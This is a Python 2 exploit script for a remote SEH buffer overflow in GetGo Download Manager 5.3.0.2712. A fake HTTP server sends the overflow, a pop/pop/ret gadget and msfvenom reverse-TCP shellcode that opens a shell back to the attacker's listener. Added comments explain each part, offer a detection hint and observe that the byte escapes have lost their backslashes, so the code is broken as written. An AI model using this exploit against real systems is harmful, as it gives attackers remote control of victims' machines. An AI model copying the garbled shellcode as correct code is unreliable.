#!/usr/bin/python

#
# Exploit Author: bzyo
# Twitter: @bzyo_
# Exploit Title: GetGo Download Manager 5.3.0.2712 - Remote Buffer Overflow (SEH)
# Date: 02-24-2018
# Vulnerable Software: GetGo Download Manager 5.3.0.2712
# Vendor Homepage: http://www.getgosoft.com/
# Version: 5.3.0.2712
# Software Link: https://www.exploit-db.com/apps/b26d82eadef93531f8beafac6105ef13-GetGoDMSetup.exe
# Tested On: Windows XP SP3
#
#
# PoC:
# 1. setup listener 443 on attacking machine
# 2. run script on attacking machine
# 3. open app on victim machine
# 4. go to download
# 5. select new, add http://attackerip to URL, index.html to File Name, and select OK
# 6. check listener, remote shell
#

import sys
import socket
import os
import time

# Address the malicious "web server" binds to. Hard-coded, so it has to be
# edited per run; the victim's download URL must point at this host (see the
# PoC steps in the header). Note: Python 2 syntax (print statements) throughout.
host = "192.168.0.149"
port = 80

# Minimal TCP listener on port 80 standing in for an HTTP server: it accepts
# one client and answers with a crafted blob rather than a real HTTP response.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((host, port))
s.listen(1)
print " [+] listening on %d ..." % port

# Block until the vulnerable client connects; bz is the accepted connection.
bz, addr = s.accept()
print "[+] connection accepted from %s" % addr[0]

# SEH-overwrite layout: 20 bytes of padding precede the nSEH/SEH record.
junk = "A"*20

#jump 6
# NOTE(review): in this listing the backslash of every "\x.." escape has been
# stripped, so as written these strings are the literal ASCII characters
# 'x','e','b',... rather than the intended raw bytes. The lengths computed
# below (and the "Payload size" comment) assume the byte form.
nseh = "xebx06x90x90"

#0x72d11f39 : pop edi # pop esi # ret 0x04 | {PAGE_EXECUTE_READ} [msacm32.drv]
# Overwritten handler address: per the author's comment a pop/pop/ret gadget in
# msacm32.drv, which lands execution back on the short jump in nseh above. The
# header reports testing on Windows XP SP3 only.
seh = "x39x1fxd1x72"

#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.149 LPORT=443 -b "x00" -f c
#Payload size: 351 bytes
# Second stage: an msfvenom reverse TCP shell connecting back to
# 192.168.0.149:443 (PoC step 1). Detection note for defenders: the observable
# artifact on the victim is the download manager itself opening an outbound
# connection to an arbitrary host on 443 immediately after an HTTP fetch.
reverse = (
"xbax8fxf6x0ex24xd9xf7xd9x74x24xf4x58x33xc9xb1"
"x52x31x50x12x83xc0x04x03xdfxf8xecxd1x23xecx73"
"x19xdbxedx13x93x3exdcx13xc7x4bx4fxa4x83x19x7c"
"x4fxc1x89xf7x3dxcexbexb0x88x28xf1x41xa0x09x90"
"xc1xbbx5dx72xfbx73x90x73x3cx69x59x21x95xe5xcc"
"xd5x92xb0xccx5exe8x55x55x83xb9x54x74x12xb1x0e"
"x56x95x16x3bxdfx8dx7bx06xa9x26x4fxfcx28xeex81"
"xfdx87xcfx2dx0cxd9x08x89xefxacx60xe9x92xb6xb7"
"x93x48x32x23x33x1axe4x8fxc5xcfx73x44xc9xa4xf0"
"x02xcex3bxd4x39xeaxb0xdbxedx7ax82xffx29x26x50"
"x61x68x82x37x9ex6ax6dxe7x3axe1x80xfcx36xa8xcc"
"x31x7bx52x0dx5ex0cx21x3fxc1xa6xadx73x8ax60x2a"
"x73xa1xd5xa4x8ax4ax26xedx48x1ex76x85x79x1fx1d"
"x55x85xcaxb2x05x29xa5x72xf5x89x15x1bx1fx06x49"
"x3bx20xccxe2xd6xdbx87xccx8fxe3xc2xa5xcdxe3xed"
"x8ex5bx05x87xe0x0dx9ex30x98x17x54xa0x65x82x11"
"xe2xeex21xe6xadx06x4fxf4x5axe7x1axa6xcdxf8xb0"
"xcex92x6bx5fx0exdcx97xc8x59x89x66x01x0fx27xd0"
"xbbx2dxbax84x84xf5x61x75x0axf4xe4xc1x28xe6x30"
"xc9x74x52xedx9cx22x0cx4bx77x85xe6x05x24x4fx6e"
"xd3x06x50xe8xdcx42x26x14x6cx3bx7fx2bx41xabx77"
"x54xbfx4bx77x8fx7bx7bx32x8dx2ax14x9bx44x6fx79"
"x1cxb3xacx84x9fx31x4dx73xbfx30x48x3fx07xa9x20"
"x50xe2xcdx97x51x27")

# Pad so that reverse + fill is always exactly 4055 bytes, keeping the total
# overflow length constant regardless of shellcode size.
fill = "D"*(4055 - len(reverse))

# Final overflow string: padding, nSEH (short jump), SEH (gadget), shellcode, filler.
payload = junk + nseh + seh + reverse + fill

# The payload is repeated three times, space-separated. The script does not say
# why; presumably tied to how the client parses the response. (`buffer` also
# shadows the Python 2 builtin of the same name.)
buffer = payload + " "
buffer+= payload + " "
buffer+= payload + " "

# Read and echo whatever the client sent first (presumably its HTTP request),
# then push the crafted response. socket.send() is not guaranteed to write the
# whole buffer and its return value is not checked here.
print bz.recv(1000)
bz.send(buffer)
print "[+] sending buffer ok "

# Give the client time to consume the response before closing both sockets.
time.sleep(3)
bz.close()
s.close()